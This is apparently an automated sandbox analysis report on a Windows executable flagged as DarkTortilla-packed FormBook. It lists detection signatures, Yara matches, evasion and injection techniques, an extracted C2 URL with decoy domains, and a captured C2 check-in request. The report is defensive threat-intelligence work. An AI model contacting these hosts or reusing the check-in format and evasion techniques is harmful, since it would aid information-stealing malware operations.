Windows Analysis Report
yaM8XR1HfL.exe

Overview

General Information

Sample name: yaM8XR1HfL.exe
renamed because original name is a hash value
Original sample name: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98.exe
Analysis ID: 1465386
MD5: 64a5e155baded9185ecd1fa9946c13aa
SHA1: 4e7c62d7d5b1353bfc0e0220ae89e5409201bc70
SHA256: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98
Tags: exe
Infos:

Detection

DarkTortilla, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
DarkTortilla DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
Name Description Attribution Blogpost URLs Link
Formbook, Formbo FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
 https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.nona23.lat/na10/www.giorgiaclerico.com Avira URL Cloud: Label: malware
Source: http://www.productivagc.com/na10/www.dexcoenergy.com Avira URL Cloud: Label: malware
Source: http://www.nona23.lat/na10/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.liamcollinai.com/na10/"], "decoy": ["tetheus.com", "ventlikeyoumeanit.com", "tintbliss.com", "rinabet357.com", "sapphireboutiqueusa.com", "abc8bet6.com", "xzcn3i7jb13cqei.buzz", "pinktravelsnagpur.com", "bt365038.com", "rtpbossujang303.shop", "osthirmaker.com", "thelonelyteacup.com", "rlc2019.com", "couverture-charpente.com", "productivagc.com", "defendercarcare.com", "abcentixdigital.com", "petco.ltd", "oypivh.top", "micro.guru", "hokivegasslots.club", "5663876.com", "symboleffekt.info", "tworiverlabsintake.com", "pegaso.store", "sasoera.com", "material.chat", "taniamckirdy.com", "dansistosproductions.com", "moromorojp.com", "z27e1thx976ez3u.buzz", "skinrenue.com", "nbvci.xyz", "jakobniinja.xyz", "snykee.com", "sl24.top", "wawturkiye.xyz", "virtualeventsbyelaine.com", "giorgiaclerico.com", "d9psk8.xyz", "hard-to-miss.space", "awclog.com", "topcomparativos.com", "somoyboutique.com", "findlove.pro", "zbo170.app", "dexcoenergy.com", "nona23.lat", "ingelset.com", "hexatelier.com", "nftees.tech", "visionarymaterialsinstitute.com", "khanyos.com", "bz59.top", "migraine-treatment-28778.bond", "catboxbot.online", "kkugames.com", "llmsearchoptimization.com", "fipbhvvb.xyz", "vmytzptc.xyz", "intermediafx.shop", "lhrrs.com", "grimreapervalley.com", "discount-fess.space"]}
Multi AV Scanner detection for submitted file
Source: yaM8XR1HfL.exe ReversingLabs: Detection: 68%
Yara detected FormBook
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: yaM8XR1HfL.exe Joe Sandbox ML: detected
Source: yaM8XR1HfL.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0017212C memset,FindFirstFileW,FindClose, 9_2_0017212C

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 217.160.0.1:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.liamcollinai.com/na10/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1Host: www.nftees.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 217.160.0.1 217.160.0.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 7_2_09258F82 getaddrinfo,setsockopt,recv, 7_2_09258F82
Source: global traffic HTTP traffic detected: GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1Host: www.nftees.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic DNS traffic detected: DNS query: www.osthirmaker.com
Source: global traffic DNS traffic detected: DNS query: www.nftees.tech
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000007.00000000.2496782788.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iptc.org/std/Iptc4xmde
Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000007.00000000.2501022529.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2501770890.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3301294769.0000000008870000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.com/na10/www.productivagc.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.comReferer:
Source: explorer.exe, 00000007.00000000.2509419071.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2652534535.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2509419071.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3306031223.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.com/na10/www.sasoera.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.top
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.top/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.top/na10/www.jakobniinja.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.topReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.com/na10/www.hokivegasslots.club
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.com/na10/www.bz59.top
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.club
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.club/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.club/na10/www.thelonelyteacup.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.clubReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyz/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyz/na10/e
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyzReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.com/na10/www.nona23.lat
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyz/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyz/na10/www.abc8bet6.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyzReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.tech
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.tech/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.tech/na10/www.nbvci.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.techReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.lat
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.lat/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.lat/na10/www.giorgiaclerico.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.latReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.com/na10/www.nftees.tech
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.com/na10/www.dexcoenergy.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.com/na10/www.liamcollinai.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.com/na10/www.awclog.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.com/na10/www.snykee.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.comReferer:
Source: explorer.exe, 00000007.00000002.3305263776.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2508398700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000007.00000002.3299618126.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000000.2502264257.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000002.3299618126.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.2498190628.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651889553.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3296372597.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009D42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000000.2508398700.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3305263776.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
